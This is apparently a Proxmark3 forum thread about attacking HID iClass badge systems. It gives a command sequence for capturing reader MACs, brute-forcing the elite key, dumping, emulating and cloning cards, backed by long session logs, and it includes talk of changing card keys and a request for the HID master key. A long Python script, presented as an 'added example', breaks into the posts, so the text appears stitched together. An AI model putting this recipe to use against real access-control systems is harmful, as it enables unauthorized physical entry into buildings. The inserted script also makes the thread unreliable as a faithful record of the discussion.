Research, development and trades concerning the powerful Proxmark3 device.
Wow, it looks like I missed all of the interesting discussions that have been occurring while I slept last night.
There appears to be an ethical dilemma here. Do we help @ET4 or not?
If @ET4 was not hired by the building owner/manager or their current security installer to do the pentest then who hired him?
My guess is that it was the "former" security installer who is now trying to discredit the "current" security company by showing that the building in question is vulnerable to an attack using the PM3's latest iclass capabilities.
The information that was divulged by @ET4 in the post earlier today (if it hasn't yet been removed) gives sufficient information to provide a hacker access into that building.
Since I happen to be familiar with that particular high security key I am able to associate the published card data to a particular building .... and I don't even live in Australia.
As a result, my personal preference would be to withhold any further assistance.
All the good people here do what they do for passion not for money/fraud.
I ask the moderators to remove such posts and preferably perma-ban people posting/requesting that kind of stuff without any warning.
He means standard. For elite, you can attack the reader with pm3. Please read through this thread, and my blogposts and you will get a better understanding
I read through the whole thread, but can't find any direct cmd to read it, and some cmds don't exist at all. Any links where I can read more of your blog posts? Thanks (I am using pm3-bin 2.0.0).
Links are here: http://martin.swende.se/blog/Elite-Hacking.html and http://martin.swende.se/blog/PM3-development.html (latest).
'hf iclass sim 2' <- attack reader, get dump
'hf iclass loclass f <file>' <- bruteforce dump
'hf iclass dump <key> e' <- dump tag with elite key <key>
'hf iclass eload <dumpfile>' <- load data into pm3
'hf iclass sim 3' <- full simulation of the dumped tag.
I may have some parameters wrong, writing off the top of my head.
Is it just me, or, given your work holiman on extracting the elite key from a reader over the air, is it much easier to break the elite system than it is to break the regular method, due to actually needing to obtain an older reader and dump the memory to extract the HID master key?
@atwolf - yes, if you don't have the standard key already, it's definitely simpler to break an elite than a standard system.
@atwolf - yes, if you don't have the standard key already, it's definitely simpler to break an elite than a standard system.
I don't know why but this amuses me greatly.
Still working on the standard to get the key, but I certainly won't be recommending moving to Elite.
He means standard. For elite, you can attack the reader with pm3. Please read through this thread, and my blogposts and you will get a better understanding
Hi Holiman,
how do I find out whether the card is standard or elite? From the outside, both cards look alike. Thanks
I haven't used pm3 for 1 year, my pm3 firmware is too old.
Can you send your pm3 firmware to me? Please compress it to Zip, my computer cannot use RAR.
Thank you. I got the key now!! Thank you holiman for helping me before!!
I haven't used pm3 for 1 year, my pm3 firmware is too old.
Can you send your pm3 firmware to me? Please compress it to Zip, my computer cannot use RAR.
Thank you. I got the key now!! Thank you holiman for helping me before!!
Please send to my email: goazvincent@gmail.com
Last edited by Go_tus (2015-07-12 16:13:51)
Go_tus - why did you remove your post ? Looked like you implemented write (and something more?). Please post a PR to github.
Yes Holiman, give me a bit of time to clean up the code.
Will fix the code and release next week, so "everyone can benefit" as someone told me.
As you can see I still have no idea what I am doing; the content of the data blocks is sensitive.
proxmark3> hf iclass dump
CSN: 3a 40 8b 01 f8 ff 12 e0
Waiting for device to dump data. Press button on device and key on keyboard to abort...
.#db# 00: 3a 40 8b 01 f8 ff 12 e0
#db# 01: 12 ff ff ff 7f 1f ff 3c
#db# 02: fe ff ff ff ff ff ff ff
#db# 03: ff ff ff ff ff ff ff ff
#db# 04: ff ff ff ff ff ff ff ff
#db# 05: ff ff ff ff ff ff ff ff
#db# 06: 03 03 03 03 00 03 e0 17
#db# 07: 1b 86 6f 33 d6 7f 8f 59
#db# 08: 2a d4 c8 21 1f 99 68 71
#db# 09: 2a d4 c8 21 1f 99 68 71
#db# 0a: ff ff ff ff ff ff ff ff
#db# 0b: ff ff ff ff ff ff ff ff
#db# 0c: ff ff ff ff ff ff ff ff
#db# 0d: ff ff ff ff ff ff ff ff
#db# 0e: ff ff ff ff ff ff ff ff
#db# 0f: ff ff ff ff ff ff ff ff
#db# 10: ff ff ff ff ff ff ff ff
#db# 11: ff ff ff ff ff ff ff ff
#db# 12: ff ff ff ff ff ff ff ff
#db# 13: ff ff ff ff ff ff ff ff
#db# 14: ff ff ff ff ff ff ff ff
#db# 15: ff ff ff ff ff ff ff ff
#db# 16: ff ff ff ff ff ff ff ff
#db# 17: ff ff ff ff ff ff ff ff
#db# 18: ff ff ff ff ff ff ff ff
#db# 19: ff ff ff ff ff ff ff ff
#db# 1a: ff ff ff ff ff ff ff ff
#db# 1b: ff ff ff ff ff ff ff ff
#db# 1c: ff ff ff ff ff ff ff ff
#db# 1d: ff ff ff ff ff ff ff ff
#db# 1e: ff ff ff ff ff ff ff ff
#db# 1f: ff ff ff ff ff ff ff ff
Got 256 bytes data (total so far 0)
.Dumped 256 bytes of data from tag.
Saved data to 'iclass_tagdump-3a408b01f8ff12e0-2.bin'
proxmark3> hf iclass
help This help
list [Deprecated] List iClass history
snoop Eavesdrop iClass communication
sim Simulate iClass tag
reader Read an iClass tag
replay Read an iClass tag via Reply Attack
dump Authenticate and Dump iClass tag
write Authenticate and Write iClass block
load Load from tagfile to iclass card
loclass Use loclass to perform bruteforce of reader attack dump
eload [experimental] Load data into iclass emulator memory
decrypt Decrypt tagdump
readtagfile Display Content from tagfile
calc_ekey Give Diversify key for this card to write to block 3
readkeyfile Read and display key from file
writekeyfile Write key to file
clone Clone tag
loadhskey Load HS Key
showhskey Show HS Key
proxmark3> hf iclass readtagfile iclass_tagdump-3a408b01f8ff12e0-2.bin
CSN : 3A 40 8B 01 F8 FF 12 E0
block[06]: 03 03 03 03 00 03 E0 17
block[07]: 1B 86 6F 33 D6 7F 8F 59
block[08]: 2A D4 C8 21 1F 99 68 71
block[09]: 2A D4 C8 21 1F 99 68 71
block[0A]: FF FF FF FF FF FF FF FF
block[0B]: FF FF FF FF FF FF FF FF
block[0C]: FF FF FF FF FF FF FF FF
block[0D]: FF FF FF FF FF FF FF FF
block[0E]: FF FF FF FF FF FF FF FF
block[0F]: FF FF FF FF FF FF FF FF
block[10]: FF FF FF FF FF FF FF FF
block[11]: FF FF FF FF FF FF FF FF
block[12]: FF FF FF FF FF FF FF FF
block[13]: FF FF FF FF FF FF FF FF
block[14]: FF FF FF FF FF FF FF FF
block[15]: FF FF FF FF FF FF FF FF
block[16]: FF FF FF FF FF FF FF FF
block[17]: FF FF FF FF FF FF FF FF
block[18]: FF FF FF FF FF FF FF FF
block[19]: FF FF FF FF FF FF FF FF
block[1A]: FF FF FF FF FF FF FF FF
block[1B]: FF FF FF FF FF FF FF FF
block[1C]: FF FF FF FF FF FF FF FF
block[1D]: FF FF FF FF FF FF FF FF
block[1E]: FF FF FF FF FF FF FF FF
block[1F]: FF FF FF FF FF FF FF FF
proxmark3> hf iclass write 0A 0000000000000000
isOk:06
CSN: 3a 40 8b 01 f8 ff 12 e0
#db# reply [00000000000000008f72]
#db# read block [0a] [0000000000000000]
#db# Write block [0a] ok
proxmark3> hf iclass dump
CSN: 3a 40 8b 01 f8 ff 12 e0
Waiting for device to dump data. Press button on device and key on keyboard to abort...
.#db# Error: Authentication Fail!
#db# Error: Authentication Fail!
#db# 00: 3a 40 8b 01 f8 ff 12 e0
#db# 01: 12 ff ff ff 7f 1f ff 3c
#db# 02: fe ff ff ff ff ff ff ff
#db# 03: ff ff ff ff ff ff ff ff
#db# 04: ff ff ff ff ff ff ff ff
#db# 05: ff ff ff ff ff ff ff ff
#db# 06: 03 03 03 03 00 03 e0 17
#db# 07: 1b 86 6f 33 d6 7f 8f 59
#db# 08: 2a d4 c8 21 1f 99 68 71
#db# 09: 2a d4 c8 21 1f 99 68 71
#db# 0a: 00 00 00 00 00 00 00 00
#db# 0b: ff ff ff ff ff ff ff ff
#db# 0c: ff ff ff ff ff ff ff ff
#db# 0d: ff ff ff ff ff ff ff ff
#db# 0e: ff ff ff ff ff ff ff ff
#db# 0f: ff ff ff ff ff ff ff ff
#db# 10: ff ff ff ff ff ff ff ff
#db# 11: ff ff ff ff ff ff ff ff
#db# 12: ff ff ff ff ff ff ff ff
#db# 13: ff ff ff ff ff ff ff ff
#db# 14: ff ff ff ff ff ff ff ff
#db# 15: ff ff ff ff ff ff ff ff
#db# 16: ff ff ff ff ff ff ff ff
#db# 17: ff ff ff ff ff ff ff ff
#db# 18: ff ff ff ff ff ff ff ff
#db# 19: ff ff ff ff ff ff ff ff
#db# 1a: ff ff ff ff ff ff ff ff
#db# 1b: ff ff ff ff ff ff ff ff
#db# 1c: ff ff ff ff ff ff ff ff
#db# 1d: ff ff ff ff ff ff ff ff
#db# 1e: ff ff ff ff ff ff ff ff
#db# 1f: ff ff ff ff ff ff ff ff
Got 256 bytes data (total so far 0)
.Dumped 256 bytes of data from tag.
Saved data to 'iclass_tagdump-3a408b01f8ff12e0-3.bin'
proxmark3>
proxmark3> hf iclass clone iclass_tagdump-3a408b01f8ff12e0-2.bin 06 0a
File name : iclass_tagdump-3a408b01f8ff12e0-2.bin
start block : 06
end block : 0a
block [06] [030303030003E017]
block [07] [1B866F33D67F8F59]
block [08] [2AD4C8211F996871]
block [09] [2AD4C8211F996871]
block [0A] [FFFFFFFFFFFFFFFF]
block [0B] [FFFFFFFFFFFFFFFF]
block [0C] [FFFFFFFFFFFFFFFF]
block [0D] [FFFFFFFFFFFFFFFF]
block [0E] [FFFFFFFFFFFFFFFF]
block [0F] [FFFFFFFFFFFFFFFF]
block [10] [FFFFFFFFFFFFFFFF]
block [11] [FFFFFFFFFFFFFFFF]
block [12] [FFFFFFFFFFFFFFFF]
block [13] [FFFFFFFFFFFFFFFF]
block [14] [FFFFFFFFFFFFFFFF]
block [15] [FFFFFFFFFFFFFFFF]
block [16] [FFFFFFFFFFFFFFFF]
block [17] [FFFFFFFFFFFFFFFF]
block [18] [FFFFFFFFFFFFFFFF]
block [19] [FFFFFFFFFFFFFFFF]
block [1A] [FFFFFFFFFFFFFFFF]
block [1B] [FFFFFFFFFFFFFFFF]
block [1C] [FFFFFFFFFFFFFFFF]
block [1D] [FFFFFFFFFFFFFFFF]
block [1E] [FFFFFFFFFFFFFFFF]
block [1F] [FFFFFFFFFFFFFFFF]
isOk:06
CSN: 3a 40 8b 01 f8 ff 12 e0
#db# Write block [06] ok
#db# Write block [07] ok
#db# Write block [08] ok
#db# Write block [09] ok
#db# Write block [0a] fail
#db# Clone incomplete
proxmark3> hf iclass dump
CSN: 3a 40 8b 01 f8 ff 12 e0
Waiting for device to dump data. Press button on device and key on keyboard to abort...
.#db# 00: 3a 40 8b 01 f8 ff 12 e0
#db# 01: 12 ff ff ff 7f 1f ff 3c
#db# 02: fe ff ff ff ff ff ff ff
#db# 03: ff ff ff ff ff ff ff ff
#db# 04: ff ff ff ff ff ff ff ff
#db# 05: ff ff ff ff ff ff ff ff
#db# 06: 03 03 03 03 00 03 e0 17
#db# 07: 1b 86 6f 33 d6 7f 8f 59
#db# 08: 2a d4 c8 21 1f 99 68 71
#db# 09: 2a d4 c8 21 1f 99 68 71
#db# 0a: 00 00 00 00 00 00 00 00
#db# 0b: ff ff ff ff ff ff ff ff
#db# 0c: ff ff ff ff ff ff ff ff
#db# 0d: ff ff ff ff ff ff ff ff
#db# 0e: ff ff ff ff ff ff ff ff
#db# 0f: ff ff ff ff ff ff ff ff
#db# 10: ff ff ff ff ff ff ff ff
#db# 11: ff ff ff ff ff ff ff ff
#db# 12: ff ff ff ff ff ff ff ff
#db# 13: ff ff ff ff ff ff ff ff
#db# 14: ff ff ff ff ff ff ff ff
#db# 15: ff ff ff ff ff ff ff ff
#db# 16: ff ff ff ff ff ff ff ff
#db# 17: ff ff ff ff ff ff ff ff
#db# 18: ff ff ff ff ff ff ff ff
#db# 19: ff ff ff ff ff ff ff ff
#db# 1a: ff ff ff ff ff ff ff ff
#db# 1b: ff ff ff ff ff ff ff ff
#db# 1c: ff ff ff ff ff ff ff ff
#db# 1d: ff ff ff ff ff ff ff ff
#db# 1e: ff ff ff ff ff ff ff ff
#db# 1f: ff ff ff ff ff ff ff ff
Got 256 bytes data (total so far 0)
.Dumped 256 bytes of data from tag.
Saved data to 'iclass_tagdump-3a408b01f8ff12e0-6.bin'
proxmark3>
Last edited by Go_tus (2015-07-16 17:27:17)
Does it always fail at blk 0a?
How strong is your antenna?
Have you tried holding your tag about 1 cm off the antenna?
My antenna is about 5 V, not so good.
I don't think I have enough knowledge to make the write function.
The iClass reader or Omnikey does it without any problems.
Different data can be written to the block,
some data cannot be written to that block,
the same data can be written to another block without any problem.
I don't know what causes it, but somehow someone will figure it out, hopefully.
proxmark3> hf iclass write 0b 2020202020202020
Failed to obtain CC! Aborting
proxmark3> hf iclass write 0b 2020202020202020
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [faffffff202020209403]
#db# Write block [0b] fail
proxmark3> hf iclass write 0b 2020202020202020
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [faffffff202020209403]
#db# Write block [0b] fail
proxmark3> hf iclass write 0b 4040404040404040
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [fa404040404040402807]
#db# Write block [0b] fail
proxmark3> hf iclass write 0b 8080808080808080
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [8080808080808080c199]
#db# Write block [0b] ok
proxmark3> hf iclass write 0b 2020202020202020
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [faffffff808080809403]
#db# Write block [0b] fail
proxmark3> hf iclass write 0b 8888888888888888
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [fa33bb00000004bb7b70]
#db# Write block [0b] fail
proxmark3> hf iclass write 0b 2020202020202020
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [faffffff000004bb9403]
#db# Write block [0b] fail
proxmark3> hf iclass write 0b 0202020202020202
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [fa02020202020202e9cc]
#db# Write block [0b] fail
proxmark3> hf iclass write 0b 0000000000000000
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [faffffff020202029403]
#db# Write block [0b] fail
proxmark3> hf iclass write 0c 0000000000000000
CSN: 78 4a 8b 01 f8 ff 12 e0
#db# reply [00000000000000008f72]
#db# Write block [0c] ok
proxmark3>
Last edited by Go_tus (2015-07-19 12:43:17)
Is that antenna voltage with a tag on it?
Sorry, not even 5 V.
without a tag # HF antenna: 3.72 V @ 13.56 MHz
with the tag # HF antenna: 3.40 V @ 13.56 MHz
need to do something about it I guess
Yeah, that would be your problem
For the record, I tried your github repo and it seems that I cannot dump an iClass tag anymore (Failed to authenticate errors). It worked again by reverting back to the main repo.
OK ... so I think I'm close. (Example below working with AA2 so as not to mess with the only tag data I have...)
proxmark3> hf iclass managekeys f mykeys.bin l
8 keys loaded
proxmark3> hf iclass clone f iclass_2.bin b 13 l 25 k 1 c
CSN: ea 2d 2e 00 fb ff 12 e0
block [13] [ffffffffffffffff] MAC [dfd534ba]
block [14] [ffffffffffffff14] MAC [ce794f52]
block [15] [ffffffffffffff15] MAC [b3d653a7]
block [16] [ffffffffffffff16] MAC [d8302ab0]
block [17] [ffffffffffffff17] MAC [5179b030]
block [18] [ffffffffffffff18] MAC [8b82ca24]
block [19] [2121212121212219] MAC [071f2341]
block [1a] [ffffffffffffff1a] MAC [c7048d95]
block [1b] [aaffffffffffff1b] MAC [3f6eb7b3]
block [1c] [121212121212121c] MAC [1b24778f]
block [1d] [ffffffffffffff1d] MAC [ada16417]
block [1e] [121212121212121e] MAC [3de088c9]
block [1f] [ffffffffffffff1f] MAC [48d9dc28]
block [20] [ffffffffffffff20] MAC [61c204bb]
block [21] [1212121212121221] MAC [0da61f52]
block [22] [ffffffffffffff22] MAC [a1e3d139]
block [23] [ffffffffffffff23] MAC [3e11bd84]
block [24] [ffffffffffffff24] MAC [e6099f3d]
block [25] [1112112111112125] MAC [3c6f7b4d]
#db# Write block [13] successful
#db# Write block [14] successful
#db# Write block [15] successful
#db# Write block [16] successful
#db# Write block [17] successful
#db# Write block [18] successful
#db# Write block [19] successful
#db# Write block [1a] successful
#db# Write block [1b] successful
#db# Write block [1c] successful
#db# Write block [1d] successful
#db# Write block [1e] successful
#db# Write block [1f] successful
#db# Write block [20] successful
#db# Write block [21] successful
#db# Write block [22] successful
#db# Write block [23] successful
#db# Write block [24] successful
#db# Write block [25] successful
#db# Clone complete
proxmark3> hf iclass dump k 0 c 1
Authentication error
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
| 00 | REMOVED |
| 01 | REMOVED |
| 02 | REMOVED |
| 03 | REMOVED |
| 04 | REMOVED |
| 05 | REMOVED |
| 06 | REMOVED |
| 07 | REMOVED |
| 08 | REMOVED |
| 09 | REMOVED |
| 0A | FFFFFFFFFFFFFFFF |
| 0B | FFFFFFFFFFFFFFFF |
| 0C | FFFFFFFFFFFFFFFF |
| 0D | FFFFFFFFFFFFFFFF |
| 0E | FFFFFFFFFFFFFFFF |
| 0F | FFFFFFFFFFFFFFFF |
| 10 | FFFFFFFFFFFFFFFF |
| 11 | FFFFFFFFFFFFFFFF |
| 12 | FFFFFFFFFFFFFFFF |
| 13 | FFFFFFFFFFFFFFFF |
| 14 | FFFFFFFFFFFFFF14 |
| 15 | FFFFFFFFFFFFFF15 |
| 16 | FFFFFFFFFFFFFF16 |
| 17 | FFFFFFFFFFFFFF17 |
| 18 | FFFFFFFFFFFFFF18 |
| 19 | 2121212121212219 |
| 1A | FFFFFFFFFFFFFF1A |
| 1B | AAFFFFFFFFFFFF1B |
| 1C | 121212121212121C |
| 1D | FFFFFFFFFFFFFF1D |
| 1E | 121212121212121E |
| 1F | FFFFFFFFFFFFFF1F |
| 20 | FFFFFFFFFFFFFF20 |
| 21 | 1212121212121221 |
| 22 | FFFFFFFFFFFFFF22 |
| 23 | FFFFFFFFFFFFFF23 |
| 24 | FFFFFFFFFFFFFF24 |
| 25 | 1112112111112125 |
| 26 | FFFFFFFFFFFFFFFF |
| 27 | FFFFFFFFFFFFFFFF |
| 28 | FFFFFFFFFFFFFFFF |
| 29 | FFFFFFFFFFFFFFFF |
| 2A | FFFFFFFFFFFFFFFF |
| 2B | FFFFFFFFFFFFFFFF |
Last edited by marshmellow (2015-07-20 21:53:25)
see my branch @ https://github.com/marshmellow42/proxmark3/tree/iclass
Cool. I will give it a try!
I tried to use a recent HID reader to sniff traffic but their new protocol between the computer and the badge reader is a real PITA so I was stuck making some progress to control the Omnikey reader instead of focusing on implementing the write commands :-/
Ultimately we need to add page selection options but it is mostly there now. Most of the hard work was done by others, I just made it pretty and fixed a few bugs (there are still some odd things that need to be worked out), and either my antenna doesn't quite cut it or there are still some improvements needed in the low level coding of the protocol (I have to repeat commands fairly often to ensure they are done, or repeat when it hits an error, and the second time goes through).
I'm not ready for a pull request yet, as I need to summarize the cli changes and the new commands, as well as further testing and bug fixing.
I have looked at the code, impressive. I have a real problem with my antenna, will try to make one following your guide.
Your code works like a treat marshmellow. Super amazing job!
I've been able to write to badges without any problem. Even converting a Std badge to elite mode worked despite an error when writing the new diversified key to the badge.
This might require a specific handling of blocks 03 and 04 but hey, if you know what you're doing, even with the error message, it actually wrote to the memory.
I think there may be something wrong with the write MAC calculation. Some tags will have consistent issues writing the same blocks:
proxmark3> hf iclass clone f iclass_1.bin b 0B l 20 k 4
CSN: fc 8c 75 01 f8 ff 12 e0
Block |0b| ffffffffffffffff | MAC |6e921963|
Block |0c| ffffffffffffffff | MAC |cc182f53|
Block |0d| ffffffffffffffff | MAC |0c073b29|
Block |0e| ffffffffffffffff | MAC |88a040b5|
Block |0f| ffffffffffffffff | MAC |a522e17d|
Block |10| ffffffffffffffff | MAC |f3db8c4d|
Block |11| ffffffffffffffff | MAC |ec619ec5|
Block |12| ffffffffffffffff | MAC |f74a406c|
Block |13| ffffffffffffffff | MAC |bf522bc1|
Block |14| ffffffffffffffff | MAC |03efba02|
Block |15| ffffffffffffffff | MAC |d7a0ffdf|
Block |16| ffffffffffffffff | MAC |d09dda1e|
Block |17| ffffffffffffffff | MAC |0d6fdb64|
Block |18| ffffffffffffffff | MAC |95853bdb|
Block |19| ffffffffffffffff | MAC |34912b5b|
Block |1a| ffffffffffffffff | MAC |9b4a1d6f|
Block |1b| aaffffffffffffff | MAC |a0280ada|
Block |1c| ffffffffffffffff | MAC |133e9e40|
Block |1d| ffffffffffffffff | MAC |286630eb|
Block |1e| ffffffffffffffff | MAC |3207d37c|
Block |1f| ffffffffffffffff | MAC |376bbe4b|
Block |20| ffffffffffffffff | MAC |2ecfd23a|
#db# Write block [0b] successful
#db# Write block [0c] successful
#db# Write block [0d] successful
#db# Write block [0e] successful
#db# Write block [0f] successful
#db# Write block [10] successful
#db# Write block [11] failed
#db# Write block [12] successful
#db# Write block [13] failed
#db# Write block [14] successful
#db# Write block [15] failed
#db# Write block [16] successful
#db# Write block [17] successful
#db# Write block [18] failed
#db# Write block [19] successful
#db# Write block [1a] successful
#db# Write block [1b] failed
#db# Write block [1c] successful
#db# Write block [1d] failed
#db# Write block [1e] successful
#db# Write block [1f] successful
#db# Write block [20] failed
#db# Clone incomplete
A write to those blocks with the same set of data will always fail, but different data will pass.
But a different tag I had no problems writing to.. (only difference = CSN)
also on the changing the keys part. my current understanding is if you have the diversified key of the old key and the diversified key of the new key, the xor of the two is what you write to the key block. correct?
since you are sending an xor of the actual new value the verification will fail. this will need to be handled as an exception. (does the config block react the same way?)
Last edited by marshmellow (2015-07-21 19:03:27)
To change the key, I used your command, calc_ekey by giving the HID standard key and the elite key I wanted. And then I wrote it on block 03 using the writeblk command and it worked. The tag is working and I can dump it using the elite key now.
I haven't updated the configuration block (block 01) because most of the time you don't really care about changing it. It describes the memory layout of the tag, its size, the fuses, etc. Unless you need to extend the default size of App1 I don't think one would need to change this block.
Writing the HID application config block (block 06) is done like any other block AFAIK.
how many tags have you tried writing to with the new code?
the output of the calc_ekey is the xor value of the two div_keys. (good to know this is working)
(i am changing this to calcnewkey and giving other options in my next push)
i think there may be something low level wrong with the code. as in when sending certain binary patterns it always fails. i'm working on narrowing this down. i now think the MAC calc is ok, but something more is wrong.
@holiman, do you have any time to chat?
Only got time to test with 1 tag so far. I don't have a lot of blanks with me at the moment.
@marshmellow, great work there!
Just mail me, I'm seldom available on any chat protocols...
Just wondering if we can clone the HID iClass card.
Hi, I am pretty new to PM3 but got it working with Mifare easily however I am trying to read from (what appears to be) an iClass tag and am not really sure if I do things properly.
proxmark3> hf search
CSN: 3c be xx xx xx xx xx xx
Mode: Application [Locked]
Coding: ISO 14443-2 B/ISO 15693
Crypt: Secured page, keys not locked
Crypt: Non secured page
RA: Read access not enabled
Mem: 2 KBits ( 32 * 8 bytes)
AA1: blocks 6-255
AA2: blocks 256-
Valid iClass Tag (or PicoPass Tag) Found - Quiting Search
Now, taking the antenna near the reader and running:
proxmark3> hf iclass sim 2
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Button pressed
#db# Done...
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
#db# Unknown command received from reader (len=4): c 2 61 10 ff fe 5f 2 1c
(repeats...)
#db# Unknown command received from reader (len=4): c 2 61 10 ff fe 5f 2 1c
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)
I believe I followed Martin Swende's blog post, which looks pretty clear:
http://martin.swende.se/blog/PM3-development.html
I read this post but am not sure exactly if that means the source code needs to be modified before being usable?
http://www.proxmark.org/forum/viewtopic.php?pid=15192#p15192
Tried with latest release branch and marshmellow's release, to no avail.
Thanks in advance for your help.
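Both the 'hf iclass dump' output posted earlier in this thread (before and after the write to block 0A) and the 'hf search' output just above are plain text that can be parsed. The following added example, not code from the Proxmark3 project, decodes the config block (block 01) the way 'hf search' does and diffs two dumps to show which blocks a write or clone actually changed; the fuse-bit names follow the Proxmark3 client source, and the sample dump lines are a constructed, trimmed copy of the dumps posted above.

```python
"""Parse Proxmark3 'hf iclass dump' output, decode the iClass config block, diff two dumps."""
import re

# Fuse bits of config-block (block 01) byte 7, named as in the Proxmark3 client
# (cmdhficlass.c); 'hf search' derives its Mode/Coding/Crypt/RA lines from them.
FUSE_FPERS = 0x80    # personalization mode still open (card not yet locked)
FUSE_CODING1 = 0x40
FUSE_CODING0 = 0x20
FUSE_CRYPT1 = 0x10
FUSE_CRYPT0 = 0x08
FUSE_RA = 0x01       # read access allowed without authentication

# Key blocks Kd (03) and Kc (04) are write-only: they always read back as ff,
# so a change there can never be observed in a dump.
UNREADABLE_BLOCKS = {0x03, 0x04}

# One dump line: anything, then '#db# NN:' and eight hex bytes.
DUMP_LINE = re.compile(r"#db#\s+([0-9a-fA-F]{2}):((?:\s+[0-9a-fA-F]{2}){8})\s*$")

# Constructed sample: a trimmed copy of the dumps posted in this thread, before and
# after 'hf iclass write 0A 0000000000000000' (blocks 07-09 left out).
DUMP_BEFORE = """\
proxmark3> hf iclass dump
CSN: 3a 40 8b 01 f8 ff 12 e0
.#db# 00: 3a 40 8b 01 f8 ff 12 e0
#db# 01: 12 ff ff ff 7f 1f ff 3c
#db# 02: fe ff ff ff ff ff ff ff
#db# 03: ff ff ff ff ff ff ff ff
#db# 04: ff ff ff ff ff ff ff ff
#db# 05: ff ff ff ff ff ff ff ff
#db# 06: 03 03 03 03 00 03 e0 17
#db# 0a: ff ff ff ff ff ff ff ff
Got 256 bytes data (total so far 0)
"""
DUMP_AFTER = """\
proxmark3> hf iclass dump
CSN: 3a 40 8b 01 f8 ff 12 e0
.#db# Error: Authentication Fail!
#db# 00: 3a 40 8b 01 f8 ff 12 e0
#db# 01: 12 ff ff ff 7f 1f ff 3c
#db# 02: fe ff ff ff ff ff ff ff
#db# 03: ff ff ff ff ff ff ff ff
#db# 04: ff ff ff ff ff ff ff ff
#db# 05: ff ff ff ff ff ff ff ff
#db# 06: 03 03 03 03 00 03 e0 17
#db# 0a: 00 00 00 00 00 00 00 00
"""

def parse_dump(text):
    """Return {block_number: 8 bytes} for every '#db# NN: ...' line in a dump."""
    blocks = {}
    for line in text.splitlines():
        m = DUMP_LINE.search(line)
        if m:
            blocks[int(m.group(1), 16)] = bytes.fromhex(m.group(2).replace(" ", ""))
    return blocks

def decode_config(block1):
    """Interpret block 01 the way 'hf search' prints it (app limit and fuse flags)."""
    applimit = block1[0]          # last block of application area 1
    fuses = block1[7]
    info = {"aa1": (6, applimit), "aa2_start": applimit + 1}
    info["mode"] = ("Personalization [Programmable]" if fuses & FUSE_FPERS
                    else "Application [Locked]")
    if fuses & FUSE_CODING1:
        info["coding"] = "RFU"
    elif fuses & FUSE_CODING0:
        info["coding"] = "ISO 14443-2 B/ISO 15693"
    else:
        info["coding"] = "ISO 14443B only"
    crypt = (bool(fuses & FUSE_CRYPT1), bool(fuses & FUSE_CRYPT0))
    info["crypt"] = {
        (True, True): "Secured page, keys not locked",
        (True, False): "Secured page, keys locked",
        (False, True): "Non secured page",
        (False, False): "No auth possible. Read only if RA is enabled",
    }[crypt]
    info["ra"] = bool(fuses & FUSE_RA)
    return info

def diff_dumps(before, after):
    """Blocks whose content differs between two dumps of the same tag.

    Returns {block: (old_bytes, new_bytes)}; write-only key blocks are skipped.
    """
    changed = {}
    for blk in sorted(set(before) | set(after)):
        if blk in UNREADABLE_BLOCKS:
            continue
        if before.get(blk) != after.get(blk):
            changed[blk] = (before.get(blk), after.get(blk))
    return changed

if __name__ == "__main__":
    before, after = parse_dump(DUMP_BEFORE), parse_dump(DUMP_AFTER)
    cfg = decode_config(before[0x01])
    print("AA1: blocks %d-%d, AA2: blocks %d-" % (cfg["aa1"][0], cfg["aa1"][1], cfg["aa2_start"]))
    print("Mode:", cfg["mode"], "| Coding:", cfg["coding"], "| Crypt:", cfg["crypt"])
    for blk, (old, new) in diff_dumps(before, after).items():
        print("block %02x changed: %s -> %s" % (blk, old.hex(), new.hex()))
```

Running the diff over the dump taken after a clone shows exactly which blocks were written, which is more reliable than the per-block "ok"/"fail" messages when the antenna is marginal.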
If it still fails, look at the output to 'hf iclass list' . It may contain more info about what is happening.
Now, taking the antenna near the reader and running:
proxmark3> hf iclass sim 2
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Button pressed
#db# Done...
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
#db# Unknown command received from reader (len=4): c 2 61 10 ff fe 5f 2 1c
(repeats...)
#db# Unknown command received from reader (len=4): c 2 61 10 ff fe 5f 2 1c
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)
It's been my experience that this happens when you attempt the Elite attack against the HID SE readers. However, in the same key system, other types of readers (PCProx) do not return the "unknown command".
Can you help to make iClass please? I can pay money.
I'm not ready for a pull request yet, as I need to summarize the cli changes and the new commands, as well as further testing and bug fixing.
Can you publish the fresh/beta proxmark3.exe with new commands for iClass cards?
Last edited by Piorun (2015-11-02 23:14:33)
The iclass additions are in the main code trunk on github now. No binaries are distributed though, you'll have to compile on your own. (And they won't help unless you have the iclass secret keys.)
It's been my experience that this happens when you attempt the Elite attack against the HID SE readers. However, in the same key system, other types of readers (PCProx) do not return the "unknown command".
I have the same issue: the card label is "HID iClass DL" and reader "HID SE"
proxmark3> hf iclass sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#... <repeat> ...
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)
Saved data to 'iclass_mac_attack.bin'
proxmark3> exit
Tested on build 2.3.0
Last edited by Piorun (2015-11-03 18:56:43)
A blank card that comes directly from the factory will have a key that has been diversified using the PicoPass "default" authentication key.
A preprogrammed card that has been initialized by HID will contain a key that has been diversified using the HID Master authentication key.
I have a few blank cards, what is the "HID Master authentication key"?
I have a few blank cards, what is the "HID Master authentication key"?
